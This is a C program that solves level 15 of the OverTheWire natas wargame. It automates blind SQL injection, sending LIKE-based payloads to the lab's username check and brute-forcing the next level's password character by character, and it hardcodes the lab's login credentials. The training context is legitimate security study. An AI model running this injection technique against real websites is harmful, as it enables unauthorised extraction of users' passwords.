solution to natas overthewire, level #15 - ninja style

1. // solution to level 15 of http://www.overthewire.org/wargames/natas/
2. // by by petter wahlman, https://twitter.com/badeip
3.  
4. // gcc level15.c -lcurl -O2 && ./a.out
5.  
6. #define _GNU_SOURCE
7. #include <stdio.h>
8. #include <stdlib.h>
9. #include <unistd.h>
10. #include <string.h>
11. #include <unistd.h>
12. #include <fcntl.h>
13. #include <signal.h>
14. #include <curl/curl.h>
15.  
16. struct mem_struct {
17.     char *memory;
18.     size_t size;
19. };
20.  
21. static unsigned int password_maxlen = 1024; // should suffice for a few light years
22. static CURL *curl;
23.  
24. static int incremental_force(const char *charset, char *password, int (*callback)(const char *))
25. {
26.     const size_t password_len = strlen(password);
27.     int i;
28.  
29.     for (i = 0; i < strlen(charset); i++) {
30.         snprintf(password + password_len, password_maxlen - password_len, "%c", charset[i]);
31.         if (!callback(password))
32.             incremental_force(charset, password, callback);
33.         password[password_len] = '\0';
34.     }
35.  
36.     return 0;
37. }
38.  
39. static inline int callback(const char *str)
40. {
41.     static unsigned long long attempts;
42.     const char spin[] = "|/-\\";
43.     struct mem_struct chunk;
44.     char *url;
45.     char *sql;
46.  
47.     asprintf(&sql, "natas16%%22%%20AND%%20binary%%20password%%20LIKE%%20%%27%s%%25%%27%%3b%%23", str);
48.     asprintf(&url, "http://natas15.natas.labs.overthewire.org/?debug=1&username=%s", sql);
49.  
50.     chunk.memory = malloc(1);
51.     chunk.size = 0;
52.  
53.     curl_easy_setopt(curl, CURLOPT_URL, url);
54.     curl_easy_setopt(curl, CURLOPT_WRITEDATA, (void *)&chunk);
55.     curl_easy_perform(curl);
56.  
57.     int match = 0;
58.     if (chunk.size && strcasestr(chunk.memory, "this user exists"))
59.         match = 1;
60.  
61.     printf("\r[%c] password: %s", spin[attempts++ % 4], match ? str : "");
62.     fflush(stdout);
63.  
64.     free(chunk.memory);
65.     free(sql);
66.     free(url);
67.  
68.     return !match;
69. }
70.  
71. static size_t curl_wmem(void *contents, size_t size, size_t nmemb, void *userp)
72. {
73.     size_t realsize = size * nmemb;
74.     struct mem_struct *mem = (struct mem_struct *)userp;
75.  
76.     mem->memory = realloc(mem->memory, mem->size + realsize + 1);
77.     if (mem->memory == NULL) {
78.         printf("not enough memory (realloc returned NULL)\n");
79.         exit(EXIT_FAILURE);
80.     }
81.  
82.     memcpy(&(mem->memory[mem->size]), contents, realsize);
83.     mem->size += realsize;
84.     mem->memory[mem->size] = 0;
85.  
86.     return realsize;
87. }
88.  
89. static void curl_init(void)
90. {
91.     curl_global_init(CURL_GLOBAL_ALL);
92.     curl = curl_easy_init();
93.     curl_easy_setopt(curl, CURLOPT_USERPWD, "natas15:m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV");
94.     curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, curl_wmem);
95.     curl_easy_setopt(curl, CURLOPT_USERAGENT, "libcurl-agent/1.0");
96. }
97.  
98. static inline void cursor_on(void) { puts("\33[?12l\33[?25h"); }
99. static inline void cursor_off(void) { puts("\33[?25l"); }
100.  
101. void sighandler(int sig)
102. {
103.     cursor_on();
104.     curl_global_cleanup();
105.     fflush(stdout);
106.     signal(sig, SIG_DFL);
107.     raise(sig);
108. }
109.  
110. int main(int argc, char **argv)
111. {
112.     const char charset[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
113.     char password[34] = { 0 };
114.     signal(SIGINT, sighandler);
115.  
116.     curl_init();
117.  
118.     cursor_off();
119.     int ret = incremental_force(charset, password, callback);
120.     cursor_on();
121.     printf("\n");
122.  
123.     curl_global_cleanup();
124.  
125.     return ret;
126. }